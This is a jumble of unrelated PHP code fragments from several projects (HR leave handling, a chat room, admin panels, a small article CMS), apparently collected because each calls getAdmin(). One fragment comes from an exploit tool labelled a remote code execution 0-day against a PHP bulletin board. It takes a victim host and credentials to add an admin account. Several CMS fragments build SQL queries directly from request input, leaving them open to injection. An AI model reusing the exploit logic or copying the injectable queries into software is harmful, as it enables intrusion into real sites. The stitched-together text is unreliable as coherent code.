public function create(User $user, TravelOrder $travel) { $employee = $user->employee; if ($user->isFinanceDirector() && getAdmin()) { return true; } if ($employee->approval_heirarchy && $employee->utility->can_file_travel_order && HumanResource::financeDirector()) { return true; } return false; }
public static function boot() { parent::boot(); static::created(function ($employee) { $employee->leave_credit()->save(new EmployeeLeaveCredit()); $employee->accumulated_leave()->save(new EmployeeAccumulatedLeave()); $employee->notifications()->create(['sent_to' => getAdmin()->id, 'sent_by' => $employee->user->id, 'subject' => 'Personal Data Sheet', 'message' => trans('notification.employee-created', ['name' => $employee->fullName()]), 'icon' => 'user', 'color' => 'purple']); }); static::updated(function ($employee) { $employee->notifications()->create(['sent_to' => getAdmin()->id, 'sent_by' => $employee->user->id, 'subject' => 'Personal Data Sheet', 'message' => trans('notification.employee-updated', ['name' => $employee->fullName()]), 'icon' => 'user', 'color' => 'purple']); }); }
/** * Execute the command. * * @return void */ public function handle() { foreach (Training::where('start', Carbon::today())->get() as $training) { $training->employees->each(function ($employee) use($training) { $training->notifications()->create(['sent_to' => $employee->user->id, 'sent_by' => getAdmin()->id, 'subject' => 'Trainings and Seminar', 'message' => $training->title . ' is scheduled to start today!', 'icon' => 'calendar', 'color' => 'primary']); }); } foreach (Training::where('end', Carbon::today())->get() as $training) { $training->employees->each(function ($employee) use($training) { $training->notifications()->create(['sent_to' => $employee->user->id, 'sent_by' => getAdmin()->id, 'subject' => 'Trainings and Seminar', 'message' => $training->title . ' is scheduled to end today! Share us your thoughts.', 'icon' => 'calendar', 'color' => 'primary']); }); } $this->info('Participants are all notified!'); }
function addTask($kan_task, $project_id) { $user = getAdmin(); $task = ManiphestTask::initializeNewTask($user); $changes = array(); $transactions = array(); $changes[ManiphestTransaction::TYPE_TITLE] = $kan_task['title']; $changes[ManiphestTransaction::TYPE_DESCRIPTION] = $kan_task['description']; $changes[ManiphestTransaction::TYPE_STATUS] = ManiphestTaskStatus::getDefaultStatus(); $changes[PhabricatorTransactions::TYPE_COMMENT] = null; $project_type = PhabricatorProjectObjectHasProjectEdgeType::EDGECONST; $transactions[] = id(new ManiphestTransaction())->setTransactionType(PhabricatorTransactions::TYPE_EDGE)->setMetadataValue('edge:type', $project_type)->setNewValue(array('=' => array_fuse(array($project_id)))); $template = new ManiphestTransaction(); foreach ($changes as $type => $value) { $transaction = clone $template; $transaction->setTransactionType($type); $transaction->setNewValue($value); $transactions[] = $transaction; } $editor = id(new ManiphestTransactionEditor())->setActor($user)->setContentSourceFromConduitRequest(new ConduitAPIRequest(array()))->setContinueOnNoEffect(true); $editor->applyTransactions($task, $transactions); }
</div> </div> <div class="top_navigation"> <ul class="top_navigation_link_container"> <li><a href="<?php echo $absoluteURL . "admin.space/"; ?> " target="_top">Home</a></li> <li style="background-image:none"><a href="<?php echo $absoluteURL . "admin.space/login/logout.php"; ?> " target="_top">Log out</a></li> </ul> <div class="back_end_name"><?php echo GetSetting('BackendName'); ?> </div> </div> <div class="top_sub_navigation">You are logged in as <strong><?php echo ucfirst(getAdmin($_SESSION['admin_login'])); ?> </strong>. Not you, please <strong><a href="<?php echo $absoluteURL . "admin.space/login/logout.php"; ?> " target="_top">Sign out</a></strong></div> </div> </body> </html>
<!-- The navbar at the top of the page --> <div id="admin-navbar"> <ul> <a href="admin.php" ><li class="admin-current">Administrator Panel</li></a> <a href="manage_users.php"><li>Manage Users</li></a> <a href="manage_listings.php"><li>Manage Listings</li></a> <a href="logout.php" style="float:right;"><li>Logout</li></a> </ul> </div> <!-- Main content of page: --> <div id="mainForm"> <h1>Administrator Panel</h1> <h3>Welcome <?php echo getAdmin($dbc, $pid); ?> !</h3> <p> Click the tabs above to manage administrator accounts or manage listings.</p> </div> </body> </html> <?php } else { # Redirect to login since user is not logged in: header('Location: admin_login.php'); die("Unauthorized User!"); }
if (!ctype_alnum(str_replace(" ", "", $checkMessage[3]))) { die("text family is invalid"); } // is IRC numeric? if ($checkMessage[5] && !is_numeric($checkMessage[5])) { die("IRC value is invalid"); } // is linebreaks numeric? if ($checkMessage[6] && !is_numeric($checkMessage[6])) { die("linebreak value is invalid"); } // is message shared? (eg. broadcast) if (stristr($checkMessage[4], "BROADCAST") && getAdmin($_SESSION['username']) || stristr($checkMessage[4], "BROADCAST") && getModerator($_SESSION['username'])) { $share = '1'; } if (stristr($checkMessage[4], "BROADCAST") && !getAdmin($_SESSION['username']) && stristr($checkMessage[4], "BROADCAST") && !getModerator($_SESSION['username'])) { die("incorrect permissions"); } } // if intelli-bot is enabled if ($CONFIG['intelliBot'] && !$_POST['uname'] && $_SESSION['username']) { $senderName = $CONFIG['intelliBotName']; } else { $senderName = $_SESSION['username']; } // if user is not silenced if (!$_SESSION['silenceStart'] || $_SESSION['silenceStart'] < date("U") - $CONFIG['silent'] * 60) { unset($_SESSION['silenceStart']); if (!$senderName || empty($senderName)) { die("invalid username"); }
*/ $_badwords = implode("|", badChars()); $_badwords = str_replace("'", "\\'", $_badwords); echo "var badChars = '" . $_badwords . "'; "; /* * assign admin status * */ if (isset($_SESSION['adminUser'])) { unset($_SESSION['adminUser']); } /* * user status * */ echo "var admin = " . getAdmin($_SESSION['username']) . "; "; echo "var moderator = " . getModerator($_SESSION['username']) . "; "; echo "var speaker = " . getSpeaker($_SESSION['username']) . "; "; /* * user messages * */ echo "var mBold = " . $CONFIG['text']['bold'] . "; "; echo "var mItalic = " . $CONFIG['text']['italic'] . "; "; echo "var mUnderline = " . $CONFIG['text']['underline'] . "; "; echo "var textColor = '" . $CONFIG['text']['color'] . "'; "; echo "var textSize = '" . $CONFIG['text']['size'] . "'; "; echo "var textFamily = '" . $CONFIG['text']['family'] . "'; "; /* * system messages *
} else { if (isset($_REQUEST['addVict'])) { $url_parsed = parse_url($_REQUEST['addVict']); if (empty($url_parsed['scheme'])) { $url_parsed = parse_url('http://' . $url); } $rtn['url'] = $url_parsed; $victPort = $url_parsed["port"]; if (!$port) { $victPort = 80; } $victPath = $url_parsed["path"]; $victHost = $url_parsed["host"]; $exp_user_env = $_REQUEST["addName"]; $exp_pass_env = t_encrypt($_REQUEST["addPass"], $v1_xKey); getAdmin($victHost, $victPort, $victPath, $exp_user_env, $exp_pass_env, 4000000000 + rand(0, 300000000)); print "<title> Ultamate PHP Board Remote Code EXEC 0-Day </title>"; print "<CENTER><B> Admin login Name:" . $_REQUEST["addName"] . "</B></CENTER>"; //this exploit code suffers from xss! print "<CENTER><B> Admin login Password:"******"addPass"] . "</B></CENTER>"; exit; } else { if (isset($_REQUEST['decrypt'])) { print "<I>ecrypted password:</I>"; print "<CENTER>" . $_REQUEST["decrypt"] . "</CENTER>"; print "<B>Decrypted password:</B>"; print "<CENTER><B>" . t_decrypt($_REQUEST["decrypt"], $v1_xKey) . "</B></CENTER>"; exit; } else { if (isset($_REQUEST['encrypt'])) { print "<I>ecrypted password:</I>";
if ($_REQUEST['s']) { $singleRoom = "AND room = '" . makeSafe($_GET['roomID']) . "'"; } // get users within last 5 mins $onlineTime = getTime() - 300; // check user activity $offlineTime = getTime() - $CONFIG['activeTimeout']; $tmp = mysql_query("\n\tSELECT id, username, userid, prevroom, room, avatar, webcam, active, online, status, watching, eCredits, guest, lastActive, userIP \n\tFROM prochatrooms_users \n\tWHERE username != '' \n\tAND active > '" . $onlineTime . "'\n\t" . $singleRoom . "\n\tGROUP BY room, username ASC\n\t") or die(mysql_error()); while ($i = mysql_fetch_array($tmp)) { $showAllUsers = 1; if (invisibleAdmins($i['username'])) { $showAllUsers = 0; } if ($showAllUsers == 1) { $iAdmin = 0; if (getAdmin($i['username'])) { $iAdmin = 1; } $iModerator = 0; if (getModerator($i['username'])) { $iModerator = 1; } $iSpeaker = 0; if (getSpeaker($i['username'])) { $iSpeaker = 1; } $i['userid'] = empty($i['userid']) ? "0" : $i['userid']; $i['room'] = empty($i['room']) ? "0" : $i['room']; $xml .= '<userlist>'; $xml .= '<id>' . $i['id'] . '</id>'; $xml .= '<userid>' . stripslashes($i['userid']) . '</userid>';
<?php /** * Created by PhpStorm. * User: henrymacbook1 * Date: 22-10-15 * Time: 18:41 */ session_start(); include_once "include/config.php"; include_once 'include/functions.php'; getHeader($description = "Edit article"); getAdmin("Edit Article"); $id = $_GET['id']; if (@$_GET['action'] == "save") { $article_title = $_POST['article_title']; $article_summery = $_POST['article_summery']; $article_content = $_POST['article_content']; $publication_date = $_POST['publication_date']; $db = mysqli_connect(HOST, USER, PASSWORD, DATABASE); $query = "UPDATE `article` SET `article_title`='{$article_title}',`article_summery`='{$article_summery}',`article_content`='{$article_content}',`publication_date`='{$publication_date}' WHERE `article_id`='{$id}'"; mysqli_query($db, $query); echo "article: {$article_title} is updated in the database"; header("location: admin.php"); exit; } else { $db = mysqli_connect(HOST, USER, PASSWORD, DATABASE); $query = "SELECT * FROM `article` WHERE `article_id` = '{$id}'"; $result = mysqli_query($db, $query); while ($rij = mysqli_fetch_array($result)) { $id = $rij['article_id'];
<?php /** * Created by PhpStorm. * User: henrymacbook1 * Date: 22-10-15 * Time: 17:40 */ session_start(); include_once "include/config.php"; include_once 'include/functions.php'; getHeader($description = "new article"); getAdmin("New Article", "DTT Multimedia"); if (@$_GET['action'] == "save") { $article_title = $_POST['article_title']; $article_summery = $_POST['article_summery']; $article_content = $_POST['article_content']; $publication_date = $_POST['publication_date']; $db = mysqli_connect(HOST, USER, PASSWORD, DATABASE); $query = "INSERT INTO `article`(`article_id`, `article_title`, `article_summery`, `article_content`, `publication_date`)\n VALUES ('', '{$article_title}', '{$article_summery}', '{$article_content}','{$publication_date}')"; // echo $query; mysqli_query($db, $query); echo "article: {$article_title} is added "; header("location: admin.php"); } else { ?> <article id="tableArticle"> <form name="articleNew" action="<?php echo $_SERVER['PHP_SELF']; ?> ?action=save" method="post">
<?php session_start(); if (!isset($_SESSION["loged"])) { $html = file_get_contents("../session_error.html"); } else { require_once "../../config.php"; require_once "../../dist/class/class.connect.php"; require_once "../../dist/functions/data.access.admin.php"; $c_host = $databaselocation; $c_user = $databaseuser; $c_pass = $databasepass; $c_db = $databasename; //RESTRINGIR SI ES UN USUARIO ADMIN $user = $_SESSION["userid"]; $admin = getAdmin($user); $admin = $admin[0]; if (!$admin) { $html = file_get_contents("admin_error.html"); } else { $username = $_SESSION["username"]; $html = file_get_contents("versions.html"); $html = str_replace("{USERNAME}", $username, $html); $versiones = getVersiones(); $html_versiones = ""; $contador = 0; foreach ($versiones as $version) { $html_versiones .= "<tr><td>" . ++$contador . "</td><td>" . utf8_encode($version->comentario) . "</td><td>" . utf8_encode($version->fecha) . "</td></tr>"; } $html = str_replace("{VERSIONES}", $html_versiones, $html); }
/** * @param Request $request */ public function store(Request $request) { $validator = $this->validator($request->all()); if ($request->user()->can('create', new EmployeeLeave())) { if ($validator->fails()) { return redirect()->back()->withInput()->withErrors($validator); } $employee = $request->user()->employee; $approvals = $employee->approval_heirarchy; $leave = $request->all(); // Add recommending approval or set status to recommended $leave = $approvals->recommending_approval ? array_add($leave, 'recommending_approval_id', $approvals->recommending_approval->id) : array_add($leave, 'status', 'recommended'); $leave = array_add($leave, 'approved_by_id', $approvals->approved_by ? $approvals->approved_by->id : null); $leave = array_add($leave, 'certified_by_id', getAdmin()->employee->id); $leave = new EmployeeLeave($leave); if ($request->user()->can('store', $leave)) { $leave = $employee->employee_leaves()->save($leave); flash()->success('Your leave application is sent. Please wait for confirmation'); return redirect()->to('/leave/personal'); } flash()->warning('You are already out of credits!'); return redirect()->back(); } flash()->error('Oopps! You are trying to breach our security!'); return redirect()->to('/'); }
<?php /** * Created by PhpStorm. * User: henrymacbook1 * Date: 22-10-15 * Time: 22:22 */ session_start(); include_once 'include/config.php'; include_once 'include/functions.php'; getHeader("adminpage", "DTT Multimedia"); getAdmin(); $db = mysqli_connect(HOST, USER, PASSWORD, DATABASE); $query = "SELECT * FROM `article`"; $result = mysqli_query($db, $query); echo "\n <div id='adminTable'>\n <table>\n <tr>\n <th>Publication Date</th>\n <th>Article</th>\n <th>edit</th>\n <th>Delete</th>\n </tr>\n <br>"; while ($rij = mysqli_fetch_array($result)) { $id = $rij['article_id']; $publication_date = $rij['publication_date']; $article_title = $rij['article_title']; echo "<tr>\n <td>{$publication_date}</td>\n <td>{$article_title}</td>\n <td><a href=\"articleEdit.php?&id={$id}\"><img src=\"../image/edit.jpg\"></a></td>\n <td><a href=\"articleDelete.php?action=delete&id={$id}\"><img src=\"../image/delete.jpg\"></a></td>\n </tr>"; } echo "\n</div>\n</table>"; getCount(); addArticle(); getFooter();
<?php $results = getUser(); foreach ($results as $result) { echo '<li id="' . $result['id'] . '_' . $result['role'] . '">' . $result['login'] . '<span class="a" onclick="redirect(\'/admin.php?a=userInfo\', getUserInfo(' . $result['id'] . '))" >Edit</span></li>'; } ?> </ul> </div> <?php if ($_SESSION['role'] > 4) { ?> <div class="role"> <h2>Administrateurs</h2> <ul id="admin"> <?php $results = getAdmin(); foreach ($results as $result) { echo '<li id="' . $result['id'] . '_' . $result['role'] . '">' . $result['login'] . '<span class="a" onclick="redirect(\'/admin.php?a=userInfo\', getUserInfo(' . $result['id'] . '))" >Edit</span></li>'; } ?> </ul> </div> <?php } if ($_SESSION['role'] > 3) { ?> <div class="role"> <h2>Officiers</h2> <ul id="officer"> <?php $results = getOfficer();
/** * Store a newly created resource in storage. * * @param Request $request * @return Response */ public function store(Request $request) { if ($this->validator($request->all())->fails()) { flash()->error('Please fill the missing fields.'); return redirect()->back()->withInput(); } else { $approvals = $request->user()->employee->approval_heirarchy; $leave = $request->all(); if ($approvals->recommending_approval) { $leave = array_add($leave, 'recommending_approval_id', $approvals->recommending_approval->id); } else { $leave = array_add($leave, 'status', 'recommended'); } $leave = array_add($leave, 'approved_by_id', $approvals->approved_by ? $approvals->approved_by->id : null); $leave = array_add($leave, 'certified_by_id', getAdmin()->employee->id); $leave = new EmployeeSpecialLeave($leave); if (Gate::allows('store', $leave)) { $leave = $this->user->employee->employee_special_leaves()->save($leave); if ($leave) { write_form(new WriteSpecialLeaveForm($leave)); flash()->success('Leave request sent. Please wait for the confirmation.'); return redirect()->to('/leave/personal'); } } flash()->error('An unknown error occured!.'); return redirect()->to('/dashboard'); } }
function invisibleAdmins($username) { // include files include getDocPath() . "includes/config.php"; $result = '0'; if ($CONFIG['invisibleAdminsPlugin']) { if (file_exists(getDocPath() . "plugins/invisible/index.js.php")) { $result = getAdmin($username); } } return $result; }